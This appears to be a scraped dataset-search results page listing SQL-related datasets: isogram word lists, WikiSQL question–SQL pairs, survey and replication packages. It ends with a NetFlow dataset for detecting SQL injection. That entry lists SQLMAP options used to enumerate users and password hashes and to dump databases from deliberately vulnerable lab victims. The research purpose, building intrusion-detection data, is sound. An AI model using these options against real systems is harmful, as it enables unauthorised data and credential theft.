If necessary, additional packages can be installed using the 'install.sh' script in the 'dependencies/' subdirectory corresponding to your operating system. As of the moment of writing, Debian-10 and Linuxmint-20.1 OSes are supported out of the box; similar OSes might work with the same 'install.sh' scripts. The installation scripts require to run package installation command under system administrator privileges, but they use *only* the standard system package manager, thus they should not put your system at risk. For validation and syntax checking, the 'rxp' and 'xmllint' programs are used.

The log files provided in the "outputs/validation" subdirectory contain validation logs obtained on the system where the XML files were last checked and should indicate validity of the provided XML file against the references schemas.

Layout of the archived file tree
--------------------------------

db/
└── release
└── v0.10.0
└── tables
├── Makeconfig-validate-xml
├── Makefile
├── Makelocal-validate-xml
├── dependencies
├── main-database-description.xml
├── outputs
└── schema
f
Data and tools for studying isograms
figshare.com
Updated Jul 31, 2017
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Florian Breit (2017). Data and tools for studying isograms [Dataset]. http://doi.org/10.6084/m9.figshare.5245810.v1
Explore at:
application/x-sqlite3Available download formats
Unique identifier
https://doi.org/10.6084/m9.figshare.5245810.v1
Dataset updated
Jul 31, 2017
Dataset provided by
figshare
Authors
Florian Breit
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
A collection of datasets and python scripts for extraction and analysis of isograms (and some palindromes and tautonyms) from corpus-based word-lists, specifically Google Ngram and the British National Corpus (BNC).Below follows a brief description, first, of the included datasets and, second, of the included scripts.1. DatasetsThe data from English Google Ngrams and the BNC is available in two formats: as a plain text CSV file and as a SQLite3 database.1.1 CSV formatThe CSV files for each dataset actually come in two parts: one labelled ".csv" and one ".totals". The ".csv" contains the actual extracted data, and the ".totals" file contains some basic summary statistics about the ".csv" dataset with the same name.The CSV files contain one row per data point, with the colums separated by a single tab stop. There are no labels at the top of the files. Each line has the following columns, in this order (the labels below are what I use in the database, which has an identical structure, see section below):

Label Data type Description

isogramy int The order of isogramy, e.g. "2" is a second order isogram

length int The length of the word in letters

word text The actual word/isogram in ASCII

source_pos text The Part of Speech tag from the original corpus

count int Token count (total number of occurences)

vol_count int Volume count (number of different sources which contain the word)

count_per_million int Token count per million words

vol_count_as_percent int Volume count as percentage of the total number of volumes

is_palindrome bool Whether the word is a palindrome (1) or not (0)

is_tautonym bool Whether the word is a tautonym (1) or not (0)

The ".totals" files have a slightly different format, with one row per data point, where the first column is the label and the second column is the associated value. The ".totals" files contain the following data:

Label

Data type

Description

!total_1grams

int

The total number of words in the corpus

!total_volumes

int

The total number of volumes (individual sources) in the corpus

!total_isograms

int

The total number of isograms found in the corpus (before compacting)

!total_palindromes

int

How many of the isograms found are palindromes

!total_tautonyms

int

How many of the isograms found are tautonyms

The CSV files are mainly useful for further automated data processing. For working with the data set directly (e.g. to do statistics or cross-check entries), I would recommend using the database format described below.1.2 SQLite database formatOn the other hand, the SQLite database combines the data from all four of the plain text files, and adds various useful combinations of the two datasets, namely:• Compacted versions of each dataset, where identical headwords are combined into a single entry.• A combined compacted dataset, combining and compacting the data from both Ngrams and the BNC.• An intersected dataset, which contains only those words which are found in both the Ngrams and the BNC dataset.The intersected dataset is by far the least noisy, but is missing some real isograms, too.The columns/layout of each of the tables in the database is identical to that described for the CSV/.totals files above.To get an idea of the various ways the database can be queried for various bits of data see the R script described below, which computes statistics based on the SQLite database.2. ScriptsThere are three scripts: one for tiding Ngram and BNC word lists and extracting isograms, one to create a neat SQLite database from the output, and one to compute some basic statistics from the data. The first script can be run using Python 3, the second script can be run using SQLite 3 from the command line, and the third script can be run in R/RStudio (R version 3).2.1 Source dataThe scripts were written to work with word lists from Google Ngram and the BNC, which can be obtained from http://storage.googleapis.com/books/ngrams/books/datasetsv2.html and [https://www.kilgarriff.co.uk/bnc-readme.html], (download all.al.gz).For Ngram the script expects the path to the directory containing the various files, for BNC the direct path to the *.gz file.2.2 Data preparationBefore processing proper, the word lists need to be tidied to exclude superfluous material and some of the most obvious noise. This will also bring them into a uniform format.Tidying and reformatting can be done by running one of the following commands:python isograms.py --ngrams --indir=INDIR --outfile=OUTFILEpython isograms.py --bnc --indir=INFILE --outfile=OUTFILEReplace INDIR/INFILE with the input directory or filename and OUTFILE with the filename for the tidied and reformatted output.2.3 Isogram ExtractionAfter preparing the data as above, isograms can be extracted from by running the following command on the reformatted and tidied files:python isograms.py --batch --infile=INFILE --outfile=OUTFILEHere INFILE should refer the the output from the previosu data cleaning process. Please note that the script will actually write two output files, one named OUTFILE with a word list of all the isograms and their associated frequency data, and one named "OUTFILE.totals" with very basic summary statistics.2.4 Creating a SQLite3 databaseThe output data from the above step can be easily collated into a SQLite3 database which allows for easy querying of the data directly for specific properties. The database can be created by following these steps:1. Make sure the files with the Ngrams and BNC data are named “ngrams-isograms.csv” and “bnc-isograms.csv” respectively. (The script assumes you have both of them, if you only want to load one, just create an empty file for the other one).2. Copy the “create-database.sql” script into the same directory as the two data files.3. On the command line, go to the directory where the files and the SQL script are. 4. Type: sqlite3 isograms.db 5. This will create a database called “isograms.db”.See the section 1 for a basic descript of the output data and how to work with the database.2.5 Statistical processingThe repository includes an R script (R version 3) named “statistics.r” that computes a number of statistics about the distribution of isograms by length, frequency, contextual diversity, etc. This can be used as a starting point for running your own stats. It uses RSQLite to access the SQLite database version of the data described above.
o
Questions to SQL Dataset
opendatabay.com
.undefined
Updated Jul 5, 2025
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Datasimple (2025). Questions to SQL Dataset [Dataset]. https://www.opendatabay.com/data/ai-ml/5a0fa182-be98-46d5-96e4-60ac97c14760
Explore at:
.undefinedAvailable download formats
Dataset updated
Jul 5, 2025
Dataset authored and provided by
Datasimple
License
CC0 1.0 Universal Public Domain Dedicationhttps://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
Area covered
Data Science and Analytics
Description
This dataset is a large, crowd-sourced collection designed for developing natural language interfaces for relational databases. It contains hand-annotated examples of natural language questions paired with their corresponding SQL queries. The data is derived from Wikipedia tables, providing a rich context for understanding how natural language can be translated into database queries. It serves as a valuable resource for training and testing models that aim to bridge the gap between human language and structured database interactions.

Columns

phase: The stage of the data collection process. (String)

question: The user's question posed in natural language. (String)

table: The specific database table relevant to the question. (String)

sql: The SQL query that corresponds to the user's question. (String)

Distribution

The dataset is typically provided in a CSV file format. It comprises 80,654 hand-annotated examples of questions and SQL queries. These examples are distributed across 24,241 distinct tables originating from Wikipedia. Specific numbers for rows or records beyond this total are not explicitly detailed, but unique values for questions are 5,069 and for SQL queries are 15,595.

Usage

This dataset is ideal for several applications: * Developing and improving natural language interfaces for relational databases. * Building a knowledge base of frequently used SQL queries. * Generating training sets for neural networks that convert natural language into SQL queries.

Coverage

The dataset's scope is global, reflecting its origins from Wikipedia tables which have worldwide applicability. There are no specific geographical, time range, or demographic notes on data availability for particular groups or years within the dataset itself. It focuses on the general relationship between questions and SQL queries.

License

CC0

Who Can Use It

This dataset is intended for: * Data scientists developing machine learning models for language processing. * AI and ML researchers focused on natural language understanding (NLU) and natural language generation (NLG) in the context of databases. * Software developers creating intelligent database query tools or conversational AI agents that interact with databases. * Academics and students conducting research in areas like computational linguistics, database systems, and artificial intelligence.

Dataset Name Suggestions

WikiSQL Natural Language Interface Data

Questions to SQL Dataset

NLP2SQL Database Interface Dataset

Structured Query Language Question Bank

Wiki Table Query Data

Attributes

Original Data Source: WikiSQL (Questions and SQL Queries)`
o
Web-based Editor for Entity-Relationship Modeling with SQL Transformation...
explore.openaire.eu
data.niaid.nih.gov
+1more
Updated Jun 9, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Luca Rar (2024). Web-based Editor for Entity-Relationship Modeling with SQL Transformation Algorithm [Dataset]. http://doi.org/10.5281/zenodo.12600841
Explore at:
Unique identifier
https://doi.org/10.5281/zenodo.12600841
Dataset updated
Jun 9, 2024
Authors
Luca Rar
Description
With the daily growth of data in all kinds of sectors, such as Information Technologies (IT), healthcare, education, commerce or telecommunication, it becomes important to use a high-performance system to manage all this data in the best possible way. Indeed, in the absence of good data management, it can be difficult for these sectors to prevent data loss, ensure safe maintenance or guarantee data security. For this reason, an effective data management system is the Entity-Relationship model. Indeed, thanks to this model, all kinds of sectors have the possibility of designing and organizing their data in relational databases, thus improving data security and better internal communication. Furthermore, it is interesting to modernize the classic approach of the Entity-Relationship model and its visual representations of data in the present day. The technologies of Augmented and Virtual Reality respond precisely to this challenge of innovation in the Entity-Relationship model. Therefore, the first objective of this thesis is to implement the Entity-Relationship model in a Meta-Modeling Platform for Augmented and Virtual Reality. The second objective is to implement an algorithm that transforms an Entity-Relationship model into SQL statements to create database tables. The Entity-Relationship model is used to design the logic of a database, and the implementation of the algorithm is used to create the database.
The dataset of the Global Collections survey of natural history collections
zenodo.org
data.niaid.nih.gov
bin, pdf, txt, zip
Updated Jul 16, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Matt Woodburn; Matt Woodburn; Robert J. Corrigan; Nicholas Drew; Cailin Meyer; Vincent S. Smith; Vincent S. Smith; Sarah Vincent; Sarah Vincent; Robert J. Corrigan; Nicholas Drew; Cailin Meyer (2024). The dataset of the Global Collections survey of natural history collections [Dataset]. http://doi.org/10.5281/zenodo.6985399
Explore at:
pdf, bin, zip, txtAvailable download formats
Unique identifier
https://doi.org/10.5281/zenodo.6985399
Dataset updated
Jul 16, 2024
Dataset provided by
Zenodohttp://zenodo.org/
Authors
Matt Woodburn; Matt Woodburn; Robert J. Corrigan; Nicholas Drew; Cailin Meyer; Vincent S. Smith; Vincent S. Smith; Sarah Vincent; Sarah Vincent; Robert J. Corrigan; Nicholas Drew; Cailin Meyer
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
From 2016 to 2018, we surveyed the world’s largest natural history museum collections to begin mapping this globally distributed scientific infrastructure. The resulting dataset includes 73 institutions across the globe. It has:

Basic institution data for the 73 contributing institutions, including estimated total collection sizes, geographic locations (to the city) and latitude/longitude, and Research Organization Registry (ROR) identifiers where available.

Resourcing information, covering the numbers of research, collections and volunteer staff in each institution.

Indicators of the presence and size of collections within each institution broken down into a grid of 19 collection disciplines and 16 geographic regions.

Measures of the depth and breadth of individual researcher experience across the same disciplines and geographic regions.

This dataset contains the data (raw and processed) collected for the survey, and specifications for the schema used to store the data. It includes:

A diagram of the MySQL database schema.

A SQL dump of the MySQL database schema, excluding the data.

A SQL dump of the MySQL database schema with all data. This may be imported into an instance of MySQL Server to create a complete reconstruction of the database.

Raw data from each database table in CSV format.

A set of more human-readable views of the data in CSV format. These correspond to the database tables, but foreign keys are substituted for values from the linked tables to make the data easier to read and analyse.

A text file containing the definitions of the size categories used in the collection_unit table.

The global collections data may also be accessed at https://rebrand.ly/global-collections. This is a preliminary dashboard, constructed and published using Microsoft Power BI, that enables the exploration of the data through a set of visualisations and filters. The dashboard consists of three pages:

Institutional profile: Enables the selection of a specific institution and provides summary information on the institution and its location, staffing, total collection size, collection breakdown and researcher expertise.

Overall heatmap: Supports an interactive exploration of the global picture, including a heatmap of collection distribution across the discipline and geographic categories, and visualisations that demonstrate the relative breadth of collections across institutions and correlations between collection size and breadth. Various filters allow the focus to be refined to specific regions and collection sizes.

Browse: Provides some alternative methods of filtering and visualising the global dataset to look at patterns in the distribution and size of different types of collections across the global view.
a
[udemy] SQL Masterclass for Financial Analysis & Financial Reporting
academictorrents.com
bittorrent
Updated Dec 26, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Irfan Sharif (2024). [udemy] SQL Masterclass for Financial Analysis & Financial Reporting [Dataset]. https://academictorrents.com/details/161282939abe2462e37cd8a59664043716a1a529
Explore at:
bittorrent(735121934)Available download formats
Dataset updated
Dec 26, 2024
Dataset authored and provided by
Irfan Sharif
License
https://academictorrents.com/nolicensespecifiedhttps://academictorrents.com/nolicensespecified
Description
Official Course URL: udemy.com/course/sql-for-financial-data-analysis/ Course Overview: Unlock the power of SQL for financial data analysis and reporting. This course is tailored for non-tech professionals who want to streamline their analytics and reporting capabilities. Learn to extract and process financial data, prepare detailed reports like Profit & Loss Statements and Balance Sheets, and calculate critical financial ratios through practical exercises. What You ll Learn: - SQL Basics: Master database querying techniques for financial data. - Report Preparation: Create Profit & Loss Statements, Balance Sheets, and Cash Flow Statements. - Key Analytics: Calculate and interpret profitability, efficiency, and liquidity ratios. - Database Skills: Gain hands-on experience without prior technical expertise. Course Benefits: - Practical Applications: Apply SQL to real-world financial scenarios. - Independent Reporting: Reduce reliance on system-generated reports. - Career Advancem
Z
Source Code Archiving to the Rescue of Reproducible Deployment — Replication...
data.niaid.nih.gov
Updated May 23, 2024
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Zacchiroli, Stefano (2024). Source Code Archiving to the Rescue of Reproducible Deployment — Replication Package [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_11243113
Explore at:
Dataset updated
May 23, 2024
Dataset provided by
Simon, Tournier
Courtès, Ludovic
Sample, Timothy
Zacchiroli, Stefano
License
Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Description
Replication package for the paper:

Ludovic Courtès, Timothy Sample, Simon Tournier, Stefano Zacchiroli.Source Code Archiving to the Rescue of Reproducible DeploymentACM REP'24, June 18-20, 2024, Rennes, Francehttps://doi.org/10.1145/3641525.3663622

Generating the paper

The paper can be generated using the following command:

guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make

This uses GNU Guix to run make in the exact same computational environment used when preparing the paper. The computational environment is described by two files. The channels.scm file specifies the exact version of the Guix package collection to use. The manifest.scm file selects a subset of those packages to include in the environment.

It may be possible to generate the paper without Guix. To do so, you will need the following software (on top of a Unix-like environment):

GNU Make

SQLite 3

GNU AWK

Rubber

Graphviz

TeXLive

Structure

data/ contains the data examined in the paper

scripts/ contains dedicated code for the paper

logs/ contains logs generated during certain computations

Preservation of Guix

Some of the claims in the paper come from analyzing the Preservation of Guix (PoG) database as published on January 26, 2024. This database is the result of years of monitoring the extent to which the source code referenced by Guix packages is archived. This monitoring has been carried out by Timothy Sample who occasionally publishes reports on his personal website: https://ngyro.com/pog-reports/latest/. The database included in this package (data/pog.sql) was downloaded from https://ngyro.com/pog-reports/2024-01-26/pog.db and then exported to SQL format. In addition to the SQL file, the database schema is also included in this package as data/schema.sql.

The database itself is largely the result of scripts, but also of manual adjustments (where necessary or convenient). The scripts are available at https://git.ngyro.com/preservation-of-guix/, which is preserved in the Software Heritage archive as well: https://archive.softwareheritage.org/swh:1:snp:efba3456a4aff0bc25b271e128aa8340ae2bc816;origin=https://git.ngyro.com/preservation-of-guix. These scripts rely on the availability of source code in certain locations on the Internet, and therefore will not yield exactly the same result when run again.

Analysis

Here is an overview of how we use the PoG database in the paper. The exact way it is queried to produce graphs and tables for the paper is laid out in the Makefile.

The pog-types.sql query gives the counts of each source type (e.g. “git” or “tar-gz”) for each commit covered by the database.

The pog-status.sql query gives the archival status of the sources by commit. For each commit, it produces a count of how many sources are stored in the Software Heritage archive, missing from it, or unknown if stored or missing. The pog-status-total.sql query does the same thing but over all sources without sorting them into individual commits.

The disarchive-ratio.sql query estimates the success rate of Disarchive disassembly.

Finally, the swhid-ratio.sql query gives the proportion of sources for which the PoG database has an SWHID.

Estimating missing sources

The Preservation of Guix database only covers sources from a sample of commits to the Guix repository. This greatly simplifies the process of collecting the sources at the risk of missing a few. We estimate how many are missed by searching Guix’s Git history for Nix-style base-32 hashes. The result of this search is compared to the hashes in the PoG database.

A naïve search of Git history results in an over estimate due to Guix’s branch development model. We find hashes that were never exposed to users of ‘guix pull’. To work around this, we also approximate the history of commits available to ‘guix pull’. We do this by scraping push events from the guix-commits mailing list archives (data/guix-commits.mbox). Unfortunately, those archives are not quite complete. Missing history is reconstructed in the data/missing-links.txt file.

This estimate requires a copy of the Guix Git repository (not included in this package). The repository can be obtained from GNU at https://git.savannah.gnu.org/git/guix.git or from the Software Heritage archive: https://archive.softwareheritage.org/swh:1:snp:9d7b8dcf5625c17e42d51357848baa226b70e4bb;origin=https://git.savannah.gnu.org/git/guix.git. Once obtained, its location must be specified in the Makefile.

To generate the estimate, use:

guix time-machine -C channels.scm
-- shell -C -m manifest.scm
-- make data/missing-sources.txt

If not using Guix, you will need additional software beyond what is used to generate the paper:

GNU Guile

GNU Bash

GNU Mailutils

GNU Parallel

Measuring link rot

In order to measure link rot, we ran Guix Scheme scripts, i.e., scripts that exploit Guix as a Scheme library. The scripts depend on the state of world at the very specific moment when they ran. Hence, it is not possible to reproduce the exact same outputs. However, their tendency over the passing of time should be very similar. For running them, you need an installation of Guix. For instance,

guix repl -q scripts/table-per-origin.scm

When running these scripts for the paper, we tracked their output and saved it inside the logs directory.
d
Current Population Survey (CPS)
search.dataone.org
dataverse.harvard.edu
Updated Nov 21, 2023
Share
Facebook
Twitter
Email
Click to copy link
Link copied
Cite
Damico, Anthony (2023). Current Population Survey (CPS) [Dataset]. http://doi.org/10.7910/DVN/AK4FDD
Explore at:
Unique identifier
https://doi.org/10.7910/DVN/AK4FDD
Dataset updated
Nov 21, 2023
Dataset provided by
Harvard Dataverse
Authors
Damico, Anthony
Description
analyze the current population survey (cps) annual social and economic supplement (asec) with r the annual march cps-asec has been supplying the statistics for the census bureau's report on income, poverty, and health insurance coverage since 1948. wow. the us census bureau and the bureau of labor statistics ( bls) tag-team on this one. until the american community survey (acs) hit the scene in the early aughts (2000s), the current population survey had the largest sample size of all the annual general demographic data sets outside of the decennial census - about two hundred thousand respondents. this provides enough sample to conduct state- and a few large metro area-level analyses. your sample size will vanish if you start investigating subgroups b y state - consider pooling multiple years. county-level is a no-no. despite the american community survey's larger size, the cps-asec contains many more variables related to employment, sources of income, and insurance - and can be trended back to harry truman's presidency. aside from questions specifically asked about an annual experience (like income), many of the questions in this march data set should be t reated as point-in-time statistics. cps-asec generalizes to the united states non-institutional, non-active duty military population. the national bureau of economic research (nber) provides sas, spss, and stata importation scripts to create a rectangular file (rectangular data means only person-level records; household- and family-level information gets attached to each person). to import these files into r, the parse.SAScii function uses nber's sas code to determine how to import the fixed-width file, then RSQLite to put everything into a schnazzy database. you can try reading through the nber march 2012 sas importation code yourself, but it's a bit of a proc freak show. this new github repository contains three scripts: 2005-2012 asec - download all microdata.R down load the fixed-width file containing household, family, and person records import by separating this file into three tables, then merge 'em together at the person-level download the fixed-width file containing the person-level replicate weights merge the rectangular person-level file with the replicate weights, then store it in a sql database create a new variable - one - in the data table 2012 asec - analysis examples.R connect to the sql database created by the 'download all microdata' progr am create the complex sample survey object, using the replicate weights perform a boatload of analysis examples replicate census estimates - 2011.R connect to the sql database created by the 'download all microdata' program create the complex sample survey object, using the replicate weights match the sas output shown in the png file below 2011 asec replicate weight sas output.png statistic and standard error generated from the replicate-weighted example sas script contained in this census-provided person replicate weights usage instructions document. click here to view these three scripts for more detail about the current population survey - annual social and economic supplement (cps-asec), visit: the census bureau's current population survey page the bureau of labor statistics' current population survey page the current population survey's wikipedia article notes: interviews are conducted in march about experiences during the previous year. the file labeled 2012 includes information (income, work experience, health insurance) pertaining to 2011. when you use the current populat ion survey to talk about america, subract a year from the data file name. as of the 2010 file (the interview focusing on america during 2009), the cps-asec contains exciting new medical out-of-pocket spending variables most useful for supplemental (medical spending-adjusted) poverty research. confidential to sas, spss, stata, sudaan users: why are you still rubbing two sticks together after we've invented the butane lighter? time to transition to r. :D

Facebook

Twitter

Click to copy link

Link copied

Cite

Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián (2022). SQL Injection Attack Netflow [Dataset]. https://portalcienciaytecnologia.jcyl.es/documentos/668fc461b9e7c03b01bdba14

Data from: SQL Injection Attack Netflow

Explore at:

Dataset updated

2022

Authors

Crespo, Ignacio; Campazas, Adrián; Crespo, Ignacio; Campazas, Adrián

Description

Introduction This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used. NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device. Datasets The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2). The datasets contain both benign and malicious traffic. All collected datasets are balanced. The version of NetFlow used to build the datasets is 5. Dataset Aim Samples Benign-malicious
traffic ratio D1 Training 400,003 50% D2 Test 57,239 50% Infrastructure and implementation Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes) Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet). The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table. Parameters Description '--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema' Enumerate users, password hashes, privileges, roles, databases, tables and columns --level=5 Increase the probability of a false positive identification --risk=3 Increase the probability of extracting data --random-agent Select the User-Agent randomly --batch Never ask for user input, use the default behavior --answers="follow=Y" Predefined answers to yes Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer). The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24.
The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases. However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes. To run the MySQL server we ran MariaDB version 10.4.12.
Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.

Clear search

Close search

Google apps

Main menu

Data from: SQL Injection Attack Netflow

sql-create-context-instruction

wikisql-generate

Stack Overflow Chat Dutch

sql-create-context

synthetic_text_to_sql

Contextual Portuguese Text2SQL

Columns

Distribution

Usage

Coverage

License

Who Can Use It

Dataset Name Suggestions

Attributes

WikiSQL Dataset

Global SQL In-Memory Database Market Size By Type (SQL, Relational data...

SQL Bike Stores

NEWSQL In Memory Database Market Report | Global Forecast From 2025 To 2033

NEWSQL In Memory Database Market Outlook

Type Analysis

SQL In Memory Database Market Report | Global Forecast From 2025 To 2033

SQL In Memory Database Market Outlook

Component Analysis

PLBD (Protein Ligand Binding Database) table description XML file

Data and tools for studying isograms

Questions to SQL Dataset

Columns

Distribution

Usage

Coverage

License

Who Can Use It

Dataset Name Suggestions

Attributes

Web-based Editor for Entity-Relationship Modeling with SQL Transformation...

The dataset of the Global Collections survey of natural history collections

[udemy] SQL Masterclass for Financial Analysis & Financial Reporting

Source Code Archiving to the Rescue of Reproducible Deployment — Replication...

Current Population Survey (CPS)

Data from: SQL Injection Attack NetflowSee More Versions

Data from: SQL Injection Attack Netflow